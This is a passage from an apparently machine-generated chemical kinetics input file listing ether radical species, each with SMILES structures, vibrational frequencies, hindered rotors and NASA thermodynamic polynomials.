NASAPolynomial(coeffs=[10.1903,0.0488487,-2.18079e-05,4.1198e-09,-2.86482e-13,14472.6,-16.0157], Tmin=(842.758,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(133.678,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + longDistanceInteraction_noncyclic(OsCs-ST) + group(Cs-CsCsOsH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(C2CsJOCs) + radical(CCsJOCs)"""), ) species( label = '[CH2]COC(C)[CH]C=C(3816)', structure = SMILES('[CH2]COC(C)[CH]C=C'), E0 = (101.023,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,3010,987.5,1337.5,450,1655,2950,3100,1380,975,1025,1650,1380,1390,370,380,2900,435,3000,3100,440,815,1455,1000,2750,2800,2850,1350,1500,750,1050,1375,1000,2750,2850,1437.5,1250,1305,750,350,200,800,1066.67,1333.33,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.328941,0.0916726,-7.53041e-05,3.24753e-08,-5.75653e-12,12308.9,31.2194], Tmin=(100,'K'), Tmax=(1321.64,'K')), NASAPolynomial(coeffs=[16.5572,0.0405664,-1.73013e-05,3.21747e-09,-2.22172e-13,7845.37,-54.9554], Tmin=(1321.64,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(101.023,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + longDistanceInteraction_noncyclic(OsCs-ST) + group(Cs-CsCsOsH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(C=CCJCO) + radical(CJCO)"""), ) species( label = 'C=[C]CC(C)O[CH]C(3817)', structure = SMILES('C=[C]CC(C)O[CH]C'), E0 = (190.815,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,1685,370,2950,3100,1380,975,1025,1650,1380,1390,370,380,2900,435,2750,2850,1437.5,1250,1305,750,350,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,200,800,1066.67,1333.33,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.116875,0.0920235,-8.42613e-05,4.28703e-08,-9.11656e-12,23096.8,32.5505], Tmin=(100,'K'), Tmax=(1108.61,'K')), NASAPolynomial(coeffs=[13.2829,0.0436758,-1.88451e-05,3.53229e-09,-2.45596e-13,20125.8,-33.4773], Tmin=(1108.61,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(190.815,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + longDistanceInteraction_noncyclic(OsCs-ST) + group(Cs-CsCsOsH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(CCsJOCs) + radical(Cds_S)"""), ) species( label = 'C=C[CH][C](C)OCC(3818)', structure = SMILES('[CH2][CH]C=C(C)OCC'), E0 = (60.3895,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.241916,0.0805121,-4.48186e-05,1.20008e-09,5.07182e-12,7426.86,32.0078], Tmin=(100,'K'), Tmax=(1057.2,'K')), NASAPolynomial(coeffs=[17.8313,0.0354302,-1.39126e-05,2.55712e-09,-1.78652e-13,2303.4,-62.3483], Tmin=(1057.2,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(60.3895,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-Cs(Cds-Cd)) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsOs) + group(Cds-CdsCsH) + radical(Allyl_S) + radical(RCCJ)"""), ) species( label = '[CH2]C(CC=C)O[CH]C(3819)', structure = SMILES('[CH2]C(CC=C)O[CH]C'), E0 = (163.484,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,3010,987.5,1337.5,450,1655,2950,3100,1380,975,1025,1650,1380,1390,370,380,2900,435,3000,3100,440,815,1455,1000,2750,2800,2850,1350,1500,750,1050,1375,1000,2750,2850,1437.5,1250,1305,750,350,200,800,1066.67,1333.33,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.476514,0.100614,-0.000104239,5.97469e-08,-1.40617e-11,19822,33.124], Tmin=(100,'K'), Tmax=(1019.28,'K')), NASAPolynomial(coeffs=[14.4489,0.0420412,-1.80417e-05,3.36892e-09,-2.33728e-13,16779.4,-39.1673], Tmin=(1019.28,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(163.484,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + longDistanceInteraction_noncyclic(OsCs-ST) + group(Cs-CsCsOsH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(CCsJOCs) + radical(CJC(C)OC)"""), ) species( label = '[CH]=CCC(C)O[CH]C(3820)', structure = SMILES('[CH]=CCC(C)O[CH]C'), E0 = (200.07,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.310273,0.0928,-8.28024e-05,3.97954e-08,-7.8573e-12,24219.7,33.1694], Tmin=(100,'K'), Tmax=(1200.49,'K')), NASAPolynomial(coeffs=[15.5654,0.0399021,-1.6706e-05,3.08966e-09,-2.13273e-13,20408,-46.322], Tmin=(1200.49,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(200.07,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + longDistanceInteraction_noncyclic(OsCs-ST) + group(Cs-CsCsOsH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(Cds_P) + radical(CCsJOCs)"""), ) species( label = '[CH2]C=CC([CH2])OCC(3772)', structure = SMILES('[CH2]C([CH]C=C)OCC'), E0 = (99.9445,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,3010,987.5,1337.5,450,1655,2950,3100,1380,975,1025,1650,1380,1390,370,380,2900,435,3000,3100,440,815,1455,1000,2750,2800,2850,1350,1500,750,1050,1375,1000,2750,2850,1437.5,1250,1305,750,350,200,800,1066.67,1333.33,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.298874,0.0964724,-8.91655e-05,4.51931e-08,-9.54898e-12,12173.7,30.2367], Tmin=(100,'K'), Tmax=(1115.57,'K')), NASAPolynomial(coeffs=[14.0838,0.0449018,-1.98234e-05,3.75425e-09,-2.62508e-13,8964.76,-40.7243], Tmin=(1115.57,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(99.9445,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + longDistanceInteraction_noncyclic(OsCs-ST) + group(Cs-CsCsOsH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(C=CCJCO) + radical(CJC(C)OC)"""), ) species( label = '[CH2][CH]OC(C)CC=C(3821)', structure = SMILES('[CH2][CH]OC(C)CC=C'), E0 = (164.563,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,3010,987.5,1337.5,450,1655,2950,3100,1380,975,1025,1650,1380,1390,370,380,2900,435,2750,2850,1437.5,1250,1305,750,350,2750,2800,2850,1350,1500,750,1050,1375,1000,3000,3100,440,815,1455,1000,200,800,1066.67,1333.33,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.406804,0.094678,-8.66438e-05,4.25818e-08,-8.55409e-12,19952.9,33.7467], Tmin=(100,'K'), Tmax=(1185.45,'K')), NASAPolynomial(coeffs=[16.0774,0.0390565,-1.62638e-05,3.00204e-09,-2.07117e-13,16044.6,-48.5844], Tmin=(1185.45,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(164.563,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + longDistanceInteraction_noncyclic(OsCs-ST) + group(Cs-CsCsOsH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(CJCO) + radical(CCsJOCs)"""), ) species( label = 'C=[C][CH]C(C)OCC(3822)', structure = SMILES('C=[C][CH]C(C)OCC'), E0 = (127.276,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,1685,370,2950,3100,1380,975,1025,1650,1380,1390,370,380,2900,435,2750,2850,1437.5,1250,1305,750,350,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,200,800,1066.67,1333.33,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.0212198,0.0883855,-7.10432e-05,3.07396e-08,-5.60672e-12,15450,29.8016], Tmin=(100,'K'), Tmax=(1261.27,'K')), NASAPolynomial(coeffs=[13.5439,0.0454995,-2.00399e-05,3.78083e-09,-2.63145e-13,12038.9,-38.5764], Tmin=(1261.27,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(127.276,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + longDistanceInteraction_noncyclic(OsCs-ST) + group(Cs-CsCsOsH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(C=CCJCO) + radical(Cds_S)"""), ) species( label = '[CH]=C[CH]C(C)OCC(3823)', structure = SMILES('[CH]C=CC(C)OCC'), E0 = (128.528,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([1380,1390,370,380,2900,435,2750,2850,1437.5,1250,1305,750,350,2995,3025,975,1000,1300,1375,400,500,1630,1680,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,200,800,960,1120,1280,1440,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.277184,0.0839529,-5.35869e-05,1.70314e-08,-2.20242e-12,15620.6,34.8068], Tmin=(100,'K'), Tmax=(1761.18,'K')), NASAPolynomial(coeffs=[19.1277,0.0398808,-1.60509e-05,2.82284e-09,-1.85533e-13,8785.4,-69.7938], Tmin=(1761.18,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(128.528,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(Cs-(Cds-Cds)CsOsH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsH) + group(Cds-CdsCsH) + radical(AllylJ2_triplet)"""), ) species( label = 'C[CH][O](2420)', structure = SMILES('C[CH][O]'), E0 = (157.6,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,3025,407.5,1350,352.5,1642.51],'cm^-1')), HinderedRotor(inertia=(0.123965,'amu*angstrom^2'), symmetry=1, barrier=(2.85019,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (44.0526,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.65562,0.0114444,2.34936e-06,-4.83164e-09,1.17966e-12,18963.9,10.3625], Tmin=(100,'K'), Tmax=(1718.65,'K')), NASAPolynomial(coeffs=[6.06294,0.0136322,-6.35953e-06,1.18407e-09,-7.90642e-14,16985.9,-5.90233], Tmin=(1718.65,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(157.6,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(199.547,'J/(mol*K)'), comment="""Thermo library: FFCM1(-) + radical(CCsJOH) + radical(CCOJ)"""), ) species( label = 'C[CH]OC(C)C1[CH]C1(3824)', structure = SMILES('C[CH]OC(C)C1[CH]C1'), E0 = (204.659,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.0842848,0.077934,-4.33036e-05,3.40071e-09,3.49607e-12,24771.9,33.105], Tmin=(100,'K'), Tmax=(1090.26,'K')), NASAPolynomial(coeffs=[16.4392,0.0372404,-1.47348e-05,2.69719e-09,-1.87009e-13,19984.5,-53.4712], Tmin=(1090.26,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(204.659,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(461.453,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + longDistanceInteraction_noncyclic(OsCs-ST) + group(Cs-CsCsCsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + ring(Cyclopropane) + radical(cyclopropane) + radical(CCsJOCs)"""), ) species( label = 'CC1[CH][CH]CC(C)O1(3825)', structure = SMILES('CC1[CH][CH]CC(C)O1'), E0 = (77.3515,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.30204,0.0422985,5.4693e-05,-9.69592e-08,4.02792e-11,9416.05,26.6635], Tmin=(100,'K'), Tmax=(925.907,'K')), NASAPolynomial(coeffs=[11.84,0.0402369,-1.23789e-05,2.03102e-09,-1.37274e-13,5601.57,-33.4253], Tmin=(925.907,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(77.3515,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(473.925,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(Cs-CsCsOsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + ring(Oxane) + radical(RCCJCC) + radical(CCJCO)"""), ) species( label = 'C=CC=C(C)OCC(3826)', structure = SMILES('C=CC=C(C)OCC'), E0 = (-175.527,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.399998,0.0811753,-3.54254e-05,-1.76681e-08,1.41407e-11,-20938.6,29.1159], Tmin=(100,'K'), Tmax=(981.346,'K')), NASAPolynomial(coeffs=[20.8197,0.0297981,-1.05685e-05,1.90842e-09,-1.35414e-13,-26794.3,-81.4725], Tmin=(981.346,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-175.527,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(461.453,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-Cs(Cds-Cd)) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsOs) + group(Cds-Cds(Cds-Cds)H) + group(Cds-Cds(Cds-Cds)H) + group(Cds-CdsHH)"""), ) species( label = 'C=CCC(C)OC=C(3827)', structure = SMILES('C=CCC(C)OC=C'), E0 = (-141.708,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.319971,0.0748521,-8.40801e-06,-5.14369e-08,2.74884e-11,-16869.8,31.0514], Tmin=(100,'K'), Tmax=(959.372,'K')), NASAPolynomial(coeffs=[23.0721,0.0260737,-8.36718e-06,1.50372e-09,-1.1023e-13,-23601.7,-92.5246], Tmin=(959.372,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-141.708,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(461.453,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-Cs(Cds-Cd)) + group(Cs-CsCsOsH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsOsH) + group(Cds-CdsHH) + group(Cds-CdsHH)"""), ) species( label = 'C=C=CC(C)OCC(3828)', structure = SMILES('C=C=CC(C)OCC'), E0 = (-65.5517,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.0777533,0.0820083,-5.81638e-05,2.09623e-08,-3.08141e-12,-7731.24,32.02], Tmin=(100,'K'), Tmax=(1571.44,'K')), NASAPolynomial(coeffs=[17.5735,0.037078,-1.5276e-05,2.76762e-09,-1.86814e-13,-13278.8,-61.1154], Tmin=(1571.44,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-65.5517,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(461.453,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(Cs-(Cds-Cds)CsOsH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + group(Cdd-CdsCds)"""), ) species( label = 'CH2(S)(40)', structure = SMILES('[CH2]'), E0 = (418.921,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([1358.21,2621.43,3089.55],'cm^-1')), ], spinMultiplicity = 1, opticalIsomers = 1, molecularWeight = (14.0266,'amu'), collisionModel = TransportData(shapeIndex=2, epsilon=(1197.29,'J/mol'), sigma=(3.8,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[4.19331,-0.00233105,8.15676e-06,-6.62986e-09,1.93233e-12,50366.2,-0.746734], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[3.13502,0.00289594,-8.16668e-07,1.13573e-10,-6.36263e-15,50504.1,4.06031], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(418.921,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(58.2013,'J/(mol*K)'), label="""CH2(S)""", comment="""Thermo library: FFCM1(-)"""), ) species( label = 'C=C[CH]CO[CH]C(3798)', structure = SMILES('C=C[CH]CO[CH]C'), E0 = (104.222,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([2950,3100,1380,975,1025,1650,2750,2800,2850,1350,1500,750,1050,1375,1000,2750,2850,1437.5,1250,1305,750,350,3010,987.5,1337.5,450,1655,3000,3050,390,425,1340,1360,335,370,200,800,1066.67,1333.33,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (98.143,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.173995,0.0808482,-7.1645e-05,3.35054e-08,-6.38097e-12,12675.4,26.3274], Tmin=(100,'K'), Tmax=(1247.9,'K')), NASAPolynomial(coeffs=[15.226,0.0326005,-1.36504e-05,2.52289e-09,-1.74037e-13,8918.7,-49.6235], Tmin=(1247.9,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(104.222,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), 